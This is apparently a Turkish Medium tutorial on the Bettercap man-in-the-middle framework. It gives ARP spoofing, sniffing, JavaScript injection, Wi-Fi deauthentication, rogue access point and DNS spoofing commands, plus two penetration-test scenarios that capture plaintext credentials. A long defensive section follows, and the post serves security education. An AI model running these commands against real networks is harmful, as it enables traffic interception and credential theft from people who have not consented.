Ağın Ortasına Oturan Araç: Bettercap
ARP protokolü 1982'de tasarlandı. Kimlik doğrulama yok. Doğrulama mekanizması yok. Bir cihaz “şu IP benim” diyorsa, ağ buna inanır. Kırk…

Ağın Ortasına Oturan Araç: Bettercap
ARP protokolü 1982'de tasarlandı. Kimlik doğrulama yok. Doğrulama mekanizması yok. Bir cihaz “şu IP benim” diyorsa, ağ buna inanır. Kırk yılı aşkın süredir bu böyle. Ve bu kırılganlık, bugün Bettercap’in en keskin silahına dönüşüyor.
— -
Bettercap Nedir?
Bettercap, ağ güvenliği profesyonelleri için geliştirilmiş açık kaynaklı bir saldırı ve izleme çerçevesidir (framework). Tek bir işlev için yazılmış bir araç değil; ağ keşfinden paket manipülasyonuna, Wi‑Fi saldırılarından kimlik bilgisi toplamaya kadar uzanan modüler bir ekosistem.
Go diliyle yazılmış olması, performansını ve taşınabilirliğini doğrudan etkiliyor. GNU/Linux, macOS, Windows, BSD ve Android üzerinde çalışıyor. Kali Linux’ta kali-tools-sniffing-spoofing metapackage içinde yer alıyor; kurulu değilse apt install bettercap ile tek adımda eklenir.
Asıl gücü esnekliğinde: caplet adı verilen betik dosyaları sayesinde karmaşık saldırı senaryoları otomatize edilebiliyor. Bir caplet, Bettercap komutlarını sırayla çalıştıran bir reçete gibi düşünülebilir.
— -
Temel Yetenekler
Bettercap’in modüler yapısı şu temel alanlara ayrılıyor:
Ağ Keşfi ve İzleme: net.recon modülü ağdaki cihazları pasif olarak tespit eder. net.show ile anlık tablo görünür. Arka planda ARP isteklerini dinleyerek yeni bağlanan cihazları yakalıyor (aktif tarama yapmadan).
ARP Spoofing ve MitM: Bettercap’in kalbi burası. arp.spoof on komutuyla araç, hedef cihaza kendisini ağ geçidi olarak tanıtır; ağ geçidine ise kendisini hedef olarak. Trafik iki yönlü olarak üzerinden geçmeye başlar. İşte o noktada sniffer devreye girer.
Paket Koklama: net.sniff on ile akan trafik yakalanır. HTTP üzerinden giden kimlik bilgileri (username, password) düz metin olarak görünür. FTP, Telnet, HTTP Basic Auth; hepsi bu kova içinde.
HTTPS Proxy ve Enjeksiyon: http.proxy on ile şifrelenmemiş HTTP trafiği yakalanır. set http.proxy.injectjs parametresiyle HTTP yanıtlarına JavaScript enjekte edilebilir (XSS simülasyonu, oturum çalma testleri için).
Wi‑Fi Saldırıları: wifi.recon on çevredeki ağları tarar. wifi.deauth ile belirli bir istemci ağdan düşürülür; yeniden bağlanırken el sıkışma (handshake) paketleri yakalanır. Bu paketler çevrimdışı şifre kırma işlemlerine zemin hazırlar.
— -
Komut Referansı
Başlatma ve Arayüz Seçimi
# Belirli bir ağ arayüzüyle başlat
bettercap -iface eth0
# Kablosuz arayüzle başlat
bettercap -iface wlan0
# Başlangıçta doğrudan bir caplet çalıştır
bettercap -iface eth0 -caplet http-ui
# Başlangıçta birden fazla komut çalıştır (noktalı virgülle ayır)
bettercap -iface eth0 -eval "net.recon on; net.show"
# Tüm komut seçeneklerini görüntüle
bettercap -h
-iface zorunlu parametredir; belirtilmezse Bettercap varsayılan arayüzü seçmeye çalışır. -eval ile oturum açılır açılmaz komutlar otomatik çalışır (caplet yazmanın kısa yolu).
— -
Ağ Keşfi
# Pasif ağ keşfini başlat (ARP dinleme)
net.recon on
# Aktif keşif: tüm subnet'e ARP probe gönder
net.probe on
# Tespit edilen cihazları tablo halinde listele
net.show
# Keşfi durdur
net.recon off
net.recon pasif dinleme yapar (sadece ARP trafiğini izler, kendisi paket üretmez). net.probe ise tüm aralığa ARP isteği göndererek sessiz cihazları da uyandırır. İkisi birlikte kullanıldığında ağın eksiksiz haritası çıkar. net.show çıktısında her cihaz için IP, MAC, üretici (OUI tablosundan), son görülme zamanı ve hostname bilgisi yer alır.
— -
ARP Spoofing
# Tek hedef belirle
set arp.spoof.targets 192.168.1.105
# Birden fazla hedef (virgülle ayır)
set arp.spoof.targets 192.168.1.105,192.168.1.110
# Subnet genelinde herkese spoof yap (dikkatli kullan)
set arp.spoof.targets 192.168.1.0/24
# İki yönlü spoofing aktif et (hem hedef hem gateway aldatılır)
set arp.spoof.fullduplex true
# ARP spoofing başlat
arp.spoof on
# Spoofing durdur (ağ normale döner)
arp.spoof off
arp.spoof.fullduplex true kritik bir parametredir. Kapalıyken Bettercap yalnızca hedef cihaza sahte ARP yanıtı gönderir; gateway hâlâ gerçek MAC adresini biliyor olabilir. fullduplex açıldığında hem hedef hem gateway eş zamanlı olarak kandırılır ve trafik gerçek anlamda iki yönlü olarak üzerinden geçer.
— -
Paket Koklama
# Sniffer başlat
net.sniff on
# Verbose mod: tüm paket içeriğini göster
set net.sniff.verbose true
# Belirli bir protokolü filtrele (BPF filter sözdizimi)
set net.sniff.filter tcp port 80
# Yakalanan paketleri PCAP dosyasına yaz
set net.sniff.output /tmp/capture.pcap
# Sniffer durdur
net.sniff off
Sniffer BPF (Berkeley Packet Filter) sözdizimini destekliyor. tcp port 80 sadece HTTP trafiğini yakalar; not arp ARP gürültüsünü filtreler. PCAP çıktısı daha sonra Wireshark’ta açılabilir ve protokol bazında ayrıştırılabilir.
— -
HTTP ve HTTPS Proxy
# HTTP proxy başlat (şifresiz trafik yakalama)
http.proxy on
# HTTPS proxy başlat (SSL strip gerektirir)
https.proxy on
# Proxy üzerinden JavaScript enjekte et
set http.proxy.injectjs http://192.168.1.1/payload.js
# Proxy loglarını görmek için event stream aç
events.stream on
# Proxy durdur
http.proxy off
https.proxy, HTTPS bağlantılarını HTTP’ye düşürerek (SSLstrip benzeri) şifreli trafiği açık metin haline getirmeye çalışır. Bu mekanizma, hedef cihazın HTTPS bağlantısını zorlamadığı durumlarda çalışır. Gerçek TLS araya girme (MitM intercept) için ise hedef cihazın Bettercap’in oluşturduğu sertifikaya güveniyor olması gerekir; bu da ya kurumsal ortamda önceden yüklenmiş bir root CA ya da sertifika uyarısını kabul eden kullanıcı anlamına gelir. İki senaryo birbirinden ayrı tutulmalıdır.
— -
Wi‑Fi Modülü
# Wi‑Fi keşfini başlat (monitor modu gerektirir)
wifi.recon on
# Çevredeki access point'leri ve istemcileri listele
wifi.show
# Belirli bir istemciyi deauthenticate et
wifi.deauth <istemci_MAC>
# Belirli bir BSSID'ye bağlı tüm istemcileri düşür
wifi.deauth ff:ff:ff:ff:ff:ff -a <BSSID>
# Sahte (rogue) access point oluştur
set wifi.ap.ssid "CorpWifi-Guest"
set wifi.ap.bssid de:ad:be:ef:00:01
set wifi.ap.channel 6
wifi.ap on
# Wi‑Fi keşfini durdur
wifi.recon off
wifi.deauth <istemci_MAC> -a <BSSID> komutu, hedef istemciye belirli bir BSSID adına deauthentication frame gönderir. ff:ff:ff:ff:ff:ff hedef MAC olarak kullanıldığında ise o BSSID’ye bağlı tüm istemcilere yönelik broadcast deauth gönderilir; -a <BSSID> parametresi bu durumda da zorunludur. wifi.ap modülü, belirtilen SSID adıyla sahte bir erişim noktası oluşturur; istemciler bu ağa bağlandığında trafikleri doğrudan yakalanabilir.
— -
DNS Spoofing
# Tüm DNS sorgularını belirli bir IP'ye yönlendir
set dns.spoof.all true
set dns.spoof.address 192.168.1.200
# Sadece belirli bir domaini yönlendir
set dns.spoof.domains hedefsite.com
set dns.spoof.address 192.168.1.200
# DNS spoofing başlat
dns.spoof on
DNS spoofing, ARP spoofing ile birlikte çalışır. Hedef cihazın DNS sorguları Bettercap üzerinden geçtiğinde, saldırgan istediği domaini istediği IP’ye yönlendirebilir. Phishing sayfaları için klasik kurulum: ARP spoof + DNS spoof + sahte web sunucusu.
— -
Caplet Sistemi
# Yüklü caplet'leri listele
caplets.show
# Caplet'leri güncelle (GitHub'dan)
caplets.update
# Bir caplet çalıştır (örnek: http-ui)
caplets.run http-ui
# HSTS bypass caplet'ini çalıştır
bettercap -iface eth0 -caplet hstshijack/hstshijack
Caplet’ler .cap uzantılı Bettercap betik dosyalarıdır. İçlerinde standart Bettercap komutları, set parametreleri ve event handler’lar bulunabilir. hstshijack, HSTS (HTTP Strict Transport Security) listesinde yer almayan domainlerde HTTPS bağlantılarını HTTP’ye düşürmeye çalışır. caplets.update komutu resmi Bettercap caplet deposunu çeker. Not: mitm6 gibi araçlar ayrı Python projeleridir; Bettercap caplet’i olarak çalıştırılamaz.
— -
Senaryo 1: Kurumsal Wi‑Fi’de Sessiz Dinleyici
Taner, orta ölçekli bir üretim şirketine atanan kıdemli sızma testi uzmanı. Görev tanımı minimal: “İç ağ güvenliğini değerlendirin.” Kapsam belgesi iki sayfa, içinde tek bir kritik not var: kurumsal Wi‑Fi segmenti dahil.
Şirketin ofisine giriyor. Misafir karşılama alanında oturuyor, dizüstü bilgisayarını açıyor. Ağa kurumsal Wi‑Fi üzerinden bağlanıyor (IT departmanı kendisine test hesabı açmış). Asıl arayüzünü (eth0) değil, monitor modu destekleyen harici USB Wi‑Fi adaptörünü (wlan1) kullanacak. Kendi trafiğini değil, ağdaki diğer cihazların trafiğini izlemesi gerekiyor.
bettercap -iface wlan0 -eval "net.recon on"
Bettercap konsolu açılıyor. wlan0 üzerinden (kendisinin ağa bağlı olduğu arayüz) ağ keşfi başlatılıyor. Birkaç saniye içinde ARP trafiğinden cihazlar görünmeye başlıyor.
net.show
Konsol çıktısı:
IP Address MAC Address Hostname Vendor
─────────────────────────────────────────────────────────────────
192.168.10.1 aa:bb:cc:11:22:33 gateway.local Cisco Systems
192.168.10.5 11:22:33:aa:bb:cc nas-storage Synology
192.168.10.12 22:33:44:bb:cc:dd DESKTOP-HR04 Dell
192.168.10.15 33:44:55:cc:dd:ee ipcam-01 Hikvision
192.168.10.18 44:55:66:dd:ee:ff printer-floor2 HP Inc.
192.168.10.23 55:66:77:ee:ff:00 LAPTOP-FIN01 Apple
...
23 cihaz. Taner, listeyi inceliyor. Vendor sütunu çok şey anlatıyor: bir Synology NAS (192.168.10.5), bir Hikvision IP kamerası, bir finans departmanına ait Apple dizüstü. Hedef önceliği zihninde şekilleniyor: NAS. Şirketin dosya sunucusu, muhtemelen tüm departmanların eriştiği ortak kaynak. Ve Synology cihazları web tabanlı yönetim arayüzüyle (DSM, yani DiskStation Manager) yönetiliyor.
Önce pasif izlemeyle başlıyor. ARP spoofing yapmadan, sadece dinliyor:
set net.sniff.verbose true
net.sniff on
İki dakika geçiyor. Sniff çıktısı ağırlıklı olarak DNS sorguları ve HTTPS trafiği. Şifreli. Okuyamıyor. Ama bir satır dikkatini çekiyor:
[net.sniff] [tcp] 192.168.10.23:54821 -> 192.168.10.5:5000
Port 5000. Synology DSM’nin varsayılan HTTP portu. Finans laptopundan NAS’a, şifrelenmemiş bağlantı. Ama içeriği göremeyecek; Bettercap bu trafiğin ortasında değil, sadece ağda.
Şimdi pozisyon alması gerekiyor.
net.sniff off
set arp.spoof.targets 192.168.10.23
set arp.spoof.fullduplex true
arp.spoof on
arp.spoof.targets parametresine finans laptopunun IP’si girildi. fullduplex true ile hem finans laptopu hem gateway eş zamanlı olarak aldatılıyor. Finans laptopunun ARP tablosu artık gateway’in IP’sini Bettercap’in MAC adresiyle eşleştiriyor. Gateway’in ARP tablosu ise finans laptopunun IP’sini yine Bettercap’in MAC’iyle biliyor. Trafik iki yönlü olarak Taner’in makinesinden geçiyor.
Bunu doğrulamak için finans laptopuna erişebilseydi şunu görürdü:
# Finans laptopundan: arp -a
192.168.10.1 (gateway) → 55:66:77:ee:ff:11 [Bettercap'in MAC'i]
Ama o laptop uzakta. Doğrulama Bettercap konsol loglarından geliyor:
[arp.spoof] sending 2 spoofed ARP replies to 192.168.10.23
[arp.spoof] gateway 192.168.10.1 has been poisoned
Sniffer yeniden başlıyor:
set net.sniff.filter tcp port 5000
net.sniff on
BPF filtresi sadece port 5000 trafiğini (DSM HTTP) yakalayacak şekilde daraltıldı. Gürültü azalıyor. On beş saniye sonra konsol şunu veriyor:
[net.sniff] [http] POST http://192.168.10.5:5000/webapi/auth.cgi
Content-Type: application/x-www-form-urlencoded
Body: api=SYNO.API.Auth&version=3&method=login&account=admin&passwd=Summer2024!&session=FileStation
Synology DSM yönetim oturumu. Kullanıcı adı admin, şifre Summer2024!. HTTP üzerinden, açık metin. Kimse fark etmedi. Finans laptopundaki kullanıcı dosyalarına erişmeye devam ediyor.
Taner sniffer’ı durduruyor, spoofing’i kapatıyor:
net.sniff off
arp.spoof off
arp.spoof off komutu verildiğinde Bettercap düzeltici ARP yanıtları gönderiyor; hedef ve gateway ARP tablolarını eski haline döndürüyor. Bağlantı kopmadan devam ediyor. Kimse bir şey fark etmedi.
Raporda bu bulgu P1 (Kritik) olarak işaretleniyor:
BC-001 (Kritik): NAS yönetim arayüzü (Synology DSM, port 5000) şifresiz HTTP protokolü üzerinden erişilebilir durumdadır. Aynı ağ segmentinde konumlanan bir saldırgan, ARP zehirlenmesi yöntemiyle yönetici kimlik bilgilerini açık metin olarak ele geçirebilir. Test sırasında admin:Summer2024! kimlik bilgileri yakalanmıştır.
— -
Senaryo 2: Konferans Salonundaki Misafir Ağı
Zeynep bir otel konferans salonunda. Ütüne bir de siber güvenlik konferansı (ironik). Konferans Wi‑Fi’si açık ağ, şifre yok, WPA2‑Personal. Tüm katılımcılar aynı pre‑shared key’i biliyor.
Bu yapıda önemli bir teknik gerçek var: WPA2‑Personal ağlarda her istemci, bağlanma anındaki 4‑way handshake’ten türetilen kendine özgü bir PTK (Pairwise Transient Key) kullanır. Bu nedenle aynı şifreyi bilen bir saldırgan, hedef istemcinin bağlanma anındaki handshake paketlerini yakalamadan o istemcinin trafiğini çözemez. Zeynep bu karmaşık yola gitmiyor. Daha doğrudan bir yol var.
bettercap -iface wlan0
net.probe on
net.show
Ağda 47 cihaz. Zeynep hedef seçmiyor; tüm segmente spoof yapacak:
set arp.spoof.targets 192.168.0.0/24
set arp.spoof.fullduplex true
arp.spoof on
net.sniff on
Subnet genelinde spoofing büyük ARP trafiği üretiyor. Gerçek bir saldırgan için riskli (gürültülü, tespit edilebilir). Ama şifresiz bir konferans ağında IDS yok.
İki dakikada şunlar geliyor:
[net.sniff] [http] GET http://hotel-wifi.portal/redirect?token=abc123
[net.sniff] [credentials] http://internal-app.company.com (admin:password123)
[net.sniff] [http] POST http://legacy-api.vendor.com/login
Body: username=john.smith@company.com&password=Conf2026!
Birisi otel Wi‑Fi captive portal’ını geçiyor. Birisi şirkette kalmış eski bir HTTP API’ye bağlanıyor. Birisi konferans vendor’unun legacy sistemine login oluyor.
Zeynep, sniff’i kapatıyor. Rapor için yeterli kanıt toplanmış oldu en nihayetinde.
Keza asıl bulgu NAS kimlik bilgisi değil: şirket çalışanlarının kurumsal kimlik bilgilerini herhangi bir ağda kullanıyor olması (kontrol edilmemiş, şifresiz, kalabalık bir konferans ağında).
— -
Savunma Katmanları
- Tüm İç Sistem Trafiğini Şifrele
Birinci ve en temel kural: HTTP yok. Yönetim arayüzleri dahil her iç sistem HTTPS üzerinden çalışmalı. Bettercap’in net.sniff modülü TLS ile şifrelenmiş trafiğin içeriğini okuyamaz; şifreleme bu saldırı vektörünü doğrudan etkisiz kılar.
# Nginx: HTTP'yi HTTPS'e zorla
server {
listen 80;
server_name _;
return 301 https://$host$request_uri;
}
server {
listen 443 ssl;
ssl_protocols TLSv1.2 TLSv1.3;
ssl_ciphers HIGH:!aNULL:!MD5;
# ...
}
Synology DSM gibi cihazlarda HTTP erişimi yönetim panelinden tamamen devre dışı bırakılabilir: Control Panel → Network → DSM Settings → Automatically redirect HTTP connections to HTTPS. Sadece bu ayar, Taner’in senaryosundaki P1 bulgusunu önlerdi.
- Dynamic ARP Inspection (DAI)
ARP spoofing’e karşı en doğrudan ağ katmanı savunması. Yönetilen (managed) switch’lerde bulunan DAI özelliği, ARP yanıtlarını DHCP snooping tablosuyla çapraz doğrular. Tablo dışından gelen sahte ARP yanıtları switch tarafından düşürülür; Bettercap’in arp.spoof on komutu gateway’e ulaşamadan engellenir.
! Cisco IOS — DHCP snooping ve DAI yapılandırması
ip dhcp snooping
ip dhcp snooping vlan 10,20,30
interface GigabitEthernet0/1
ip dhcp snooping trust ! Uplink port güvenilir işaretlenir
ip arp inspection vlan 10,20,30
interface GigabitEthernet0/2
ip arp inspection trust ! Uplink tarafı trusted; istemci portları trusted değil
Yalnızca uplink ve trunk portları trust olarak işaretlenmeli (istemci portları asla). Bu yapılandırma, arp.spoof.fullduplex true ile yapılan iki yönlü zehirlemeyi de engeller.
- 802.1X Port Authentication (EAP‑TLS ile)
Bettercap’i çalıştırmak için önce ağa bağlanmak gerekiyor. 802.1X bu ilk adımı kesiyor. IEEE 802.1X, her bağlanan cihazın kimlik doğrulamasını zorunlu kılıyor; kimlik doğrulaması tamamlanmadan port trafiğe açılmıyor.
EAP‑TLS (sertifika tabanlı) en güçlü yöntem. Sadece şirket tarafından verilmiş sertifikaya sahip cihazlar bağlanabiliyor:
! Cisco IOS — 802.1X port konfigürasyonu
aaa new-model
aaa authentication dot1x default group radius
dot1x system-auth-control
interface GigabitEthernet0/5
switchport mode access
authentication port-control auto
dot1x pae authenticator
Wi‑Fi tarafında WPA2‑Enterprise (802.1X) kullanımı, paylaşılan şifre sorununu ortadan kaldırır. Konferans senaryosundaki açık ağ yapısı bu mimaride mümkün olmaz; her kullanıcı kendi kimlik bilgileriyle ayrı ayrı doğrulanır.
- Wi‑Fi: Management Frame Protection (802.11w / MFP)
802.11w standardı, deauthentication ve disassociation çerçevelerini (management frames) şifreleyerek koruma altına alır. wifi.deauth saldırısının çalışmasının nedeni bu çerçevelerin kimlik doğrulama gerektirmemesidir; 802.11w bu boşluğu kapatıyor.
WPA3, 802.11w’yi zorunlu kılıyor. WPA2 ağlarında manuel etkinleştirme gerekiyor:
! Cisco AireOS WLC — PMF yapılandırması (klasik WLC CLI)
! WLAN konfigürasyonunda:
wlan security wpa akm dot1x
wlan security wpa wpa2 ciphers aes
wlan security pmf required ! PMF (Protected Management Frames) zorunlu
! Alternatif: optional (destekleyen istemciler için aktif, desteklemeyenler bağlanabilir)
wlan security pmf optional
Not: Cisco 9800 Series (IOS‑XE tabanlı) WLC’lerde syntax farklıdır; o platformda PMF yapılandırması WLAN profili altında pmf-mode required şeklinde uygulanır. Kullanılan platforma göre dokümantasyonu kontrol etmek gerekir.
required modu sadece 802.11w destekleyen istemcilerin bağlanmasına izin verir (eski cihazları dışarıda bırakır). optional geçiş dönemi için; ama wifi.deauth saldırısını tam engellemiyor.
- Ağ Segmentasyonu ve VLAN İzolasyonu
Düz bir ağda (192.168.1.0/24 içinde herkes herkesin trafiğini görebilir) Bettercap için ideal zemin var. VLAN segmentasyonu bu yüzeyi daraltıyor.
! Cisco IOS — VLAN segmentasyonu
vlan 10
name CORP_USERS
vlan 20
name SERVERS
vlan 30
name IOT_DEVICES
vlan 40
name PRINTERS
! Inter-VLAN routing ACL: IoT cihazlar sunuculara erişemesin
ip access-list extended BLOCK_IOT_TO_SERVERS
deny ip 192.168.30.0 0.0.0.255 192.168.20.0 0.0.0.255
permit ip any any
IoT kameraları, yazıcılar ve misafir cihazları ayrı VLAN’lara taşındığında, bu segmentten yapılan bir ARP spoofing saldırısı yalnızca aynı VLAN’daki cihazları etkiler. NAS, sunucular veya finans laptopları farklı segmentte olduğundan erişilemez hale gelir.
- ARP Trafiği Anomali Tespiti (IDS/IPS)
Bettercap’in arp.spoof modülü periyodik olarak sahte ARP yanıtları gönderiyor. Suricata’nın ARP katmanı desteği kısıtlı olduğundan bu trafik için en güvenilir tespit yöntemi arpwatch gibi özel ARP izleme araçlarıdır.
arpwatch, ARP tablosundaki MAC‑IP eşleşmelerini baseline olarak kaydeder ve herhangi bir değişiklik saptandığında “flip flop” olayı olarak işaretleyip log üretir:
# arpwatch kurulumu ve başlatma (Debian/Ubuntu)
apt install arpwatch
arpwatch -i eth0
# Dağıtıma göre veri dosyası /var/lib/arpwatch/arp.dat veya eth0.dat olarak oluşturulur
# Yeni MAC-IP eşleşmesi veya değişikliği saptandığında e-posta gönderir
arp.spoof on komutu verildiği andan itibaren saniyeler içinde uyarı üretiyor. SIEM entegrasyonu için arpwatch logları /var/log/syslog’a yazılır ve Splunk, Elastic gibi sistemlere kolayca beslenir.
- Endpoint Seviyesinde HTTP Zorunluluğu (HSTS Preloading)
Bettercap’in hstshijack caplet’i, HSTS listesinde yer almayan domainlerde etkili. Bu yüzden kritik domain’lerin HSTS preload listesine dahil edilmesi önemli:
# Web sunucusu response header
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
preload direktifi ve hstspreload.org üzerinden başvuru yapıldığında domain tarayıcıların hardcoded HSTS listesine girer. Bu domain’e hiçbir zaman HTTP üzerinden istek yapılmaz; sunucuya ulaşmadan önce tarayıcı HTTPS’e yönlendirir.
Tek bir kontrol yeterli değil. DAI, ARP spoofing’i switch katmanında keser ama Wi‑Fi deauth’u engellemez. 802.11w, Wi‑Fi deauth’u engeller ama kablolu ağdaki sniffing’e müdahil olmaz. HTTPS, sniffing’i içerik düzeyinde anlamsız kılar ama bağlantı kesilmesini durdurmaz. 802.1X ağa girişi kontrol eder ama içeriden bir saldırganı durdurmaz. Katmanlar birbirinin körlük noktalarını kapatır.
— -
2026'da Bettercap: Modüler Yapının Evrimi
Bettercap’in caplet sistemi, aracı bir platform haline getiriyor. Topluluk tarafından geliştirilen caplet’ler GitHub’da hâlâ aktif olarak yayınlanıyor. BetterCap’ın web tabanlı UI’ı (ui modülü), saldırı akışını tarayıcıdan yönetmeyi sağlıyor (komut satırı bilgisi gerekmeden).
Bu erişilebilirlik artıyor. AI destekli araçlar, ağ keşfini ve hedef seçimini otomatize etmeye başladı. Önümüzdeki yıllarda Bettercap gibi çerçevelerin, daha akıllı hedefleme modülleriyle entegre olması bekleniyor.
Protokol tasarımındaki mirasın yarattığı borç (kimlik doğrulamasız ARP, korumasız yönetim çerçeveleri) hâlâ ödeniyor. Bettercap bu borcu görünür kılan araçlardan biri. Görünür olmayan bir tehdit savunulamaz.
Şimdilik bu kadar. Daha fazlası için profilimi ziyaret edebilirsiniz.
메타데이터
- post_id
- 04fcf4f76cdc
- slug
- ağın-ortasına-oturan-araç-bettercap-04fcf4f76cdc
- url
- https://medium.com/@ibrahimyigitctn/a%C4%9F%C4%B1n-ortas%C4%B1na-oturan-ara%C3%A7-bettercap-04fcf4f76cdc
- canonical_url
- https://medium.com/@ibrahimyigitctn/a%C4%9F%C4%B1n-ortas%C4%B1na-oturan-ara%C3%A7-bettercap-04fcf4f76cdc
- author_url
- https://medium.com/@ibrahimyigitctn
- status
- ok
- fetched_at
- 2026-07-07 04:41:59